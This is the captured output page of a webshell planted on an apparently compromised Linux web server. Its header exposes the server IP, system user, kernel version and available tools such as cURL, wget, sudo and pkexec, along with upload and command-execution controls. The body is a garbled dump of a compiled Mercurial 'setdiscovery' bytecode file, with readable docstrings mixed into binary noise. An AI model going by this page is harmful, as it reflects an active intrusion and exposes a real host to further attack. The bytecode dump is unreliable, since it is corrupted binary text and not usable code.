403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /lib64/python3.9/site-packages/mercurial/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /lib64/python3.9/site-packages/mercurial/__pycache__/setdiscovery.cpython-39.pyc
a

�+�bH�@s�dZddlmZddlZddlZddlmZddlmZddl	m
Z
mZmZddd	�Z
ddd�ZGd
d�de�ZeZejdded�Zddd�ZdS)a;
Algorithm works in the following way. You have two repository: local and
remote. They both contains a DAG of changelists.

The goal of the discovery protocol is to find one set of node *common*,
the set of nodes shared by local and remote.

One of the issue with the original protocol was latency, it could
potentially require lots of roundtrips to discover that the local repo was a
subset of remote (which is a very common case, you usually have few changes
compared to upstream, while upstream probably had lots of development).

The new protocol only requires one interface for the remote repo: `known()`,
which given a set of changelists tells you if they are present in the DAG.

The algorithm then works as follow:

 - We will be using three sets, `common`, `missing`, `unknown`. Originally
 all nodes are in `unknown`.
 - Take a sample from `unknown`, call `remote.known(sample)`
   - For each node that remote knows, move it and all its ancestors to `common`
   - For each node that remote doesn't know, move it and all its descendants
   to `missing`
 - Iterate until `unknown` is empty

There are a couple optimizations, first is instead of starting with a random
sample of missing, start by sending all heads, in the case where the local
repo is a subset, you computed the answer in one round trip.

Then you can do something similar to the bisecting strategy used when
finding faulty changesets. Instead of random samples, you can try picking
nodes that will maximize the number of nodes that will be
classified with it (since all ancestors or descendants will be marked as well).
�)�absolute_importN�)�_��nullrev)�error�policy�utilcCs�i}t�|�}t�}d}|r�|��}	|	|vr.q|�|	d�}
|
|krJ|d9}|
|krp|�|	�|rpt|�|krpdS|�|	�||	�D]2}|tkr�|r�||vr�|�||
d�|�|�q�qdS)a[update an existing sample to match the expected size

    The sample is updated with revs exponentially distant from each head of the
    <revs> set. (H~1, H~2, H~4, H~8, etc).

    If a target size is specified, the sampling will stop once this size is
    reached. Otherwise sampling will happen until roots of the <revs> set are
    reached.

    :revs:  set of revs we want to discover (if None, assume the whole dag)
    :heads: set of DAG head revs
    :sample: a sample to update
    :parentfn: a callable to resolve parents for a revision
    :quicksamplesize: optional target size of the sampler�N)	�collections�deque�set�popleft�
setdefault�add�lenr�append)�revsZheads�sampleZparentfn�quicksamplesizeZdistZvisit�seenZfactorZcurr�d�p�r�</usr/lib64/python3.9/site-packages/mercurial/setdiscovery.py�
_updatesample9s(


rTcCsDt|�|kr|S|r$tt�||��St|�}|��t|d|��S)z�return a random subset of sample of at most desiredlen item.

    If randomize is False, though, a deterministic subset is returned.
    This is meant for integration tests.
    N)rr
�randomr�list�sort)rZ
desiredlen�	randomizerrr�_limitsample_sr c@s~eZdZdZddd�Zdd�Zdd�Zd	d
�Zdd�Zd
d�Z	e
dd��Zdd�Zdd�Z
dd�Zdd�Zdd�Zdd�ZdS)�partialdiscoveryaban object representing ongoing discovery

    Feed with data from the remote repository, this object keep track of the
    current set of changeset in various states:

    - common:    revs also known remotely
    - undecided: revs we don't have information on yet
    - missing:   revs missing remotely
    (all tracked revisions are known locally)
    TcCs<||_||_|j��|_d|_t�|_d|_||_	||_
dS�N)�_repo�_targetheads�	changelogZincrementalmissingrevs�_common�
_undecidedr
�missing�_childrenmap�_respectsizer)�self�repoZtargetheadsZrespectsizerrrr�__init__zszpartialdiscovery.__init__cCs(|j�|�|jdur$|j�|j�dS)zregister nodes known as commonN)r&Zaddbasesr'Zremoveancestorsfrom)r+Zcommonsrrr�
addcommons�s
zpartialdiscovery.addcommonscCs2|j�d||j�}|r.|j�|�|j�|�dS)zregister some nodes as missings%ld::%ldN)r#r�	undecidedr(�update�difference_update)r+ZmissingsZ
newmissingrrr�addmissings�szpartialdiscovery.addmissingscCsTt�}t�}|D]"\}}|r(|�|�q|�|�q|rB|�|�|rP|�|�dS)z*consume an iterable of (rev, known) tuplesN)r
rr.r2)r+r�commonr(�revZknownrrr�addinfo�s
zpartialdiscovery.addinfocCs
|j��S)z6return True is we have any clue about the remote state)r&Zhasbases�r+rrr�hasinfo�szpartialdiscovery.hasinfocCs|jduo|jS)z1True if all the necessary data have been gatheredN)r'r6rrr�
iscomplete�szpartialdiscovery.iscompletecCs*|jdur|jSt|j�|j��|_|jSr")r'r
r&Zmissingancestorsr$r6rrrr/�s
zpartialdiscovery.undecidedcCsdt|j�iS)Nr/)rr/r6rrr�stats�s
�zpartialdiscovery.statscCs
|j��S)z!the heads of the known common set)r&Z
basesheadsr6rrr�commonheads�szpartialdiscovery.commonheadscs|jjjj��fdd�}|S)Ncs�|�dd�S)N��r)�r�Zgetrevrr�
getparents�sz3partialdiscovery._parentsgetter.<locals>.getparents)r#r%�index�__getitem__)r+r?rr>r�_parentsgetter�szpartialdiscovery._parentsgettercCsz|jdur|jjSi|_}|��}|j}t|�D]@}g||<||�D]*}|tkrTqF|�|�}|durF|�|�qFq2|jSr")r)rArBr/�sortedr�getr)r+Zchildren�
parentrevsrr4�prev�crrr�_childrengetter�s


z partialdiscovery._childrengettercCsb|j}t|�|krt|�St|j�d|��}t|�|krHt|||jd�Std|||�	�|d�|S)atakes a quick sample of size <size>

        It is meant for initial sampling and focuses on querying heads and close
        ancestors of heads.

        :headrevs: set of head revisions in local DAG to consider
        :size: the maximum size of the sample�
heads(%ld)�rN)r)
r/rrr
r#rr rrrB)r+�headrevs�sizerrrrr�takequicksample�s�z partialdiscovery.takequicksamplecCs|j}t|�|krt|�S|j}t|�d|��}|��}|��}t||||�t|�d|��}|�	�}	t||||	�|s|J�|j
s�t|tt|�t|���}t
|||jd�}t|�|k�r|t|�}
t||�}|jr�|�t�||
��n|��|�|d|
��|S)NrIs
roots(%ld)rJ)r/rrr#r
rrB�copyrrHr*�max�minr rr0rrr)r+rKrLrr,rrEZ	revsheadsZ	revsrootsZchildrenrevsZmoreZtakefromrrr�takefullsample�s.zpartialdiscovery.takefullsampleN)T)�__name__�
__module__�__qualname__�__doc__r-r.r2r5r7r8�propertyr/r9r:rBrHrMrQrrrrr!ns


r!Z	discoveryZPartialDiscovery)�member�defaultc(	st|�dd��}t��}d}|j}	|	j�|	j�|durJ�fdd�|D�}
ndd�|	��D�}
|�dd�}|�	dd	�}|�	dd
�}
|�rf|j
r�t|
|�}t|�}n|
}|�
d�|d7}|���:}|�d
i�}|�dd�fdd�|D�i�}Wd�n1s�0Y|��|��}}|du�r,d|d<|	��tk�r�||	jgk�rV|	jgd|fS|	jgdgfSn>|���}|�d
i�}Wd�n1�s�0Y|��}|�td��g}|D]F}||	jk�rΐq�z|��|��Wntj�y�Y�q�Yn0�q�|�rtt|�t|�k�r.|�
d�|d|fSt|�t|
�k�rtt|��rt|�td���fdd�|
D�}|d|fS|jj}|dd�}|�o�|j
}|dd�}|�p�|j
}|�dd�}|	jj�r�t}nt }|||
||d�}|�r�|�!|�|�"t#||��|}|j$td�td�d�}|�%��s0|�s2|�&��rp|�rH|�td��n
|�
d �|j'} |
}!|�r�t(|
|�}
n|�
d!�|j)} |}!| |
|!�}|d7}|�*|�|�+�}"|�
d"||"d#t|�f�t|�}|���2}|�dd�fd$d�|D�i���}Wd�n1�s0Yd}|�"t#||���q|�,�}#t��|}$|�-�|�
d%||$f�d&}%t.|#�t.|�}&|�/d'|%t|#�t|&�||$�|du�r�||d<|#�s�||	jgk�r�|�r�t�0td(���n|�1td)��|	jhd|fS||	jgk}'�fd*d+�|#D�}#|#|'|fS),aReturn a tuple (common, anyincoming, remoteheads) used to identify
    missing nodes from or in remote.

    The audit argument is an optional dictionnary that a caller can pass. it
    will be updated with extra data about the discovery, this is useful for
    debug.
    sdevelsdiscovery.grow-sample.raterNcsg|]}�|��qSrr)�.0�n)�clrevrr�
<listcomp>6�z#findcommonheads.<locals>.<listcomp>cSsg|]}|tkr|�qSrr)rYr4rrrr\8r]sdiscovery.exchange-headssdiscovery.sample-size.initialsdiscovery.sample-sizesquery 1; heads
rsheadssknownsnodescsg|]}�|��qSrr�rYr=��clnoderrr\r]stotal-roundtripsTFssearching for changes
sall remote heads known locally
s$all local changesets known remotely
csg|]}�|��qSrrr^r_rrr\�r]sdiscovery.grow-samplesdiscovery.grow-sample.dynamicsdiscovery.randomizerJs	searchingsqueries)Zunitssampling from both directions
staking initial sample
staking quick initial sample
s2query %i; still undecided: %i, sample size is: %i
r/csg|]}�|��qSrrr^r_rrr\�r]s%d total queries in %.4fs
sDfound %d common and %d unknown server heads, %d roundtrips in %.4fs
s	discoverysrepository is unrelateds!warning: repository is unrelated
csh|]}�|��qSrrr^r_rr�	<setcomp>r]z"findcommonheads.<locals>.<setcomp>)2�floatZconfigr	Ztimerr%�noder4rK�
configboolZ	configintZlimitedargumentsr r�debugZcommandexecutorZcallcommand�resultZtiprevrZnullid�statusrrr�LookupErrorr�allZnote�uir@Zrust_ext_compatr!�pure_partialdiscoveryr.r5�zipZmakeprogressr8r7rQ�intrMr0r9r:Zcompleter
�logZAbort�warn)(rj�localZremoteZabortwhenunrelatedZancestorsof�auditZsamplegrowth�startZ
roundtripsZclZownheadsZinitial_head_exchangeZinitialsamplesizeZfullsamplesizer�eZfheadsZfknownZ
srvheadhashesZyesnoZ
knownsrvheadsrcZ
ownheadhashesrdZgrow_sampleZdynamic_sampleZhard_limit_sampler�pdZdiscoZfullZprogressZ
samplefuncZ
targetsizer9rf�elapsed�msgr(Zanyincomingr)r`r[r�findcommonheadss�4



��"

,











��
��(�
�rw)r)T)TNN)rUZ
__future__rrrZi18nrrcr�rrr	rr �objectr!rkZ
importrustrwrrrr�<module>s$#
&
(�	�

Youez - 2016 - github.com/yon3zu
LinuXploit